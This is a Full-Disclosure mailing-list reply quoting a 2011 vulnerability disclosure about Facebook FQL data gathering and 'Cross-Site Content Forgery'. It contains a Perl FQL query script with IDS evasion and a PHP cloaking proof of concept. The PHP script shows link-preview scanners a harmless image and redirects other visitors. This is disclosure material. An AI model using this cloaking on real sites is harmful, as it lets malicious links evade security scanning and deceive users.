Shit man, that's serious business....
(S-K trying to take over FD) Of course it's not your code dickwad. All ya know is talking & posting shit on an IT Sec mailing list. On Sat, Oct 8, 2011 at 7:53 PM, Laurelai <laure...@oneechan.org> wrote: > Blackhatacademy has asked me to post this to the mailing list as im one of > the instructors there, I did not personally develop the exploit, please > direct questions regarding it to hatter on irc.blackhatacademy.org > > Overview > Over the years, facebook has been vulnerable to numerous web > exploitation<http://www.blackhatacademy.org/security101/index.php?title=Web_Exploitation>techniques, > such as > XSS <http://www.blackhatacademy.org/security101/index.php?title=XSS>, FQL > injection (similar to SQL > injection<http://www.blackhatacademy.org/security101/index.php?title=SQL_injection>), > application worms, and redirect protection bypass. Because they continue to > attempt to write their own language implementations, they are repeatedly > vulnerable. Security by obscurity doesn't work if they document their own > markup > language <http://developers.facebook.com/docs/reference/fbml/> and query > language <http://developers.facebook.com/docs/reference/fql/> for > attackers. History > > XSS <http://www.blackhatacademy.org/security101/index.php?title=XSS> in > facebook first started out as a flaw in their > fbml<http://developers.facebook.com/docs/reference/fbml/>markup and > subsequently became evident in a variety of facebook > applications. > Applications<http://www.blackhatacademy.org/security101/index.php?title=Applications>also > exposed users to third party attacks that could affect a user's web > browser or force actions as the affected user. Now there is a way to bypass > content restrictions on links and posts put on a user's public wall. > Facebook was notified of these > vulnerabilities<http://www.blackhatacademy.org/security101/index.php?title=Vulnerability>on > July 31st, 2011. To date (October 4, 2011) Facebook has yet to do > anything about this; demonstrating a deplorable lack of reasonable care for > all of their users. For this reason, the > vulnerability<http://www.blackhatacademy.org/security101/index.php?title=Vulnerability>proof > of concept code is being brought to light. Facebook has only recently > purchased websense to attempt to push this vulnerability under the rug, > however the exploit still works. > FQL > > Simply requiring an API key for privileged queries does not protect > facebook from people arbitrarily obtaining one. Facebook was even so kind as > to give a reference of tables and columns in the documentation for FQL. To > access Facebook's FQL API, it takes only a well-formed HTTP request with an > embedded API key to return a valid XML object. FQL Does not allow the use of > JOINS, however it is not needed as everything is thoroughly documented. > Attackers can misuse this during the creation of a malicious facebook > application or directly on the FQL development api page for information > gathering. The implementation below uses LibWhisker2 for IDS evasion via > session splicing. > > #!/usr/bin/perluse warnings;use XML::Simple;use LW2;use Getopt::Std;my %opts; > getopts('q:',\%opts);my $query = $opts{q} if defined $opts{q};$query = > "SELECT pic_big FROM user WHERE uid=6666666" unless defined $opts{q};my $ref > = fqlQuery($query);foreach my $parent (sort keys %{$ref}) { > if (%{$ref->{$parent}}) { > print "$parent: \n"; > foreach my $key (sort keys %{$ref->{$parent}}) { > if (%{$ref->{$parent}->{$key}}) { > print "\t$key : \n"; > foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) { > print "\t\t$mojo : "; > print $ref->{$parent}->{$key}->{$mojo}; > print "\n"; > } > } else { print "\t$key : "; > print $ref->{$parent}->{$key}; > print "\n"; > } > } > } else { > print "$parent : " . $ref->{$parent} . "\n"; > }}sub fqlQuery { > my $q = shift; > $q =~ s/ /%20/g; > my $link = "http://api.facebook.com/method/fql.query?query=$q" > <http://api.facebook.com/method/fql.query?query=$q>; > my $text = download($link,"api.facebook.com"); > my $ref = XMLin($text); > return($ref);}sub download{ > my $uri = shift; > my $try = 5; > my $host = shift; > my %request; > my %response; > LW2::http_init_request(\%request); > $request{'whisker'}->{'method'} = "GET"; > $request{'whisker'}->{'host'} = $host; > $request{'whisker'}->{'uri'} = $uri; > $request{'whisker'}->{'encode_anti_ids'} = 9; > $request{'whisker'}->{'user-agent'} = ""; > LW2::http_fixup_request(\%request); > if(LW2::http_do_request(\%request, \%response)) { > if($try < 5) { > print "Failed to fetch $uri on try $try. Retrying...\n"; > return undef if(!download($uri, $try++)); > } > print "Failed to fetch $uri.\n"; > return undef; > } else { > return ($response{'whisker'}->{'data'}, > $response{'whisker'}->{'data'}); > }} > > Content Forgery > > While most major sites that allow link submission are vulnerable to this > method, sites including websense, google+, and facebook make the requests > easily identifiable. These sites send an initial request to the link in > order to store a mirror thumbnail of the image, or a snapshot of the website > being linked to. In doing so, many use a custom user agent, or have IP > addresses<http://www.blackhatacademy.org/security101/index.php?title=IP_address>that > resolve to a consistant domain name. Facebook IP > addresses<http://www.blackhatacademy.org/security101/index.php?title=IP_address>resolve > to > tfbnw.net, also set a custom user agent of "facebookexternalhit". Google+ > (Also notified Jul. 31st and guilty of reasonable care) again follows suit > and utilizes "Feedfetcher-Google" as their user agent. Knowing this, we can > easily filter out requests coming from these websites, and offer up a > legitimate image to be displayed on their site, while redirecting or > displaying a completely different page to anyone that follows the links. > Facebook's recent partnership with websense is laughable, due to websense's > "ACE" security scanner that is just as easily identified, by using > gethostbyaddr in order to resolve the IP back to websense.com. Utilizing > this technique, would allow an overwhelming number of malware sites to > remain undetected to their automatic site analysis. Other places like > digg.com either spoof a user agent to look like normal traffic, or forward > the client's user agent, which makes it more difficult to catch every one of > their requests. Fortunately, digg.com only requests the link once, prior > to submitting the link to the world. This allows attackers to serve up a > legitimate image until that initial request clears our server, and then > replace it with a less than honest file. We have affectionately named this > vulnerability class Cross-Site Content > Forgery<http://www.blackhatacademy.org/security101/index.php?title=XSCF>. > > Screenshots & Video > > Facebook <http://i.imgur.com/rJf7G.jpg> Google+ > <http://i.imgur.com/GSL2s.jpg> Youtube video of PoC for both > <http://www.youtube.com/watch?v=w6trQc0vWH4> > > CIDR > > CIDR ranges can also be checked as well. A list of netranges is below, > followed by an htaccess and PoC code for a jpeg file. > Websense > > *ASN 13448* > > 86.111.216.0/21 > 204.15.64.0/21 > 208.80.192.0/21 > 208.87.232.0/21 > 192.132.210.0/24 > 206.169.148.0/24 > 67.117.201.128/28 > 80.69.16.112/29 > 2605:7000::/32 > 2620:0:C0::/48 > > Facebook > > *ASN 32934/54115* > > 173.252.64.0/18 > 69.171.224.0/19 > 66.220.144.0/20 > 69.63.176.0/20 > 31.13.24.0/21 > 74.119.76.0/22 > 65.204.104.128/28 > 66.92.180.48/28 > 212.187.194.160/28 > 212.187.196.96/28 > 67.200.105.48/29 > 66.93.78.176/29 > 66.199.37.136/29 > 2620:0:1C00::/48 > > Proof of Concept > > In order to exploit this flaw, JPG images will need to have a custom > mimetype returned. This can be accomplished via the following .htaccess > directives: > > AddType x-httpd-php .jpg > AddHandler application/x-httpd-php .jpg > > <?php# User agent checking methods$fb_string = '/facebookexternal/i'; > # facebookexternal shows in the facebook content scanner's user > agent$gplus_string = '/Feedfetcher-Google/i'; # googleplus shows up in > the user agent as well.# rDNS Lookup Methods$host_websense = > '/websense.com/i'; # Checking the rdns for websense filters$host_fb = > '/tfbnw.net/i'; # Checking the rdns for > tfbnw.net - facebook host# Load the request properties$u_agent = > $_SERVER['HTTP_USER_AGENT'];$u_ref = $_SERVER['HTTP_REFERER'];$u_host = > gethostbyaddr($_SERVER['REMOTE_ADDR']);# If we're coming from or facebook or > websense or google plus, if (preg_match($host_fb,$u_host) || > preg_match($host_websense,$u_host) || preg_match($fb_string,$u_agent) || > preg_match($gplus_string,$u_agent)) { > # Display an image header('Content-Type: image/jpeg'); > @readfile ('/var/www/localhost/cute_kitten.jpeg');} else { > # Rickroll this unsuspecting user header('Location: > http://www.youtube.com/watch?v=dQw4w9WgXcQ&ob=av3e');}?> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/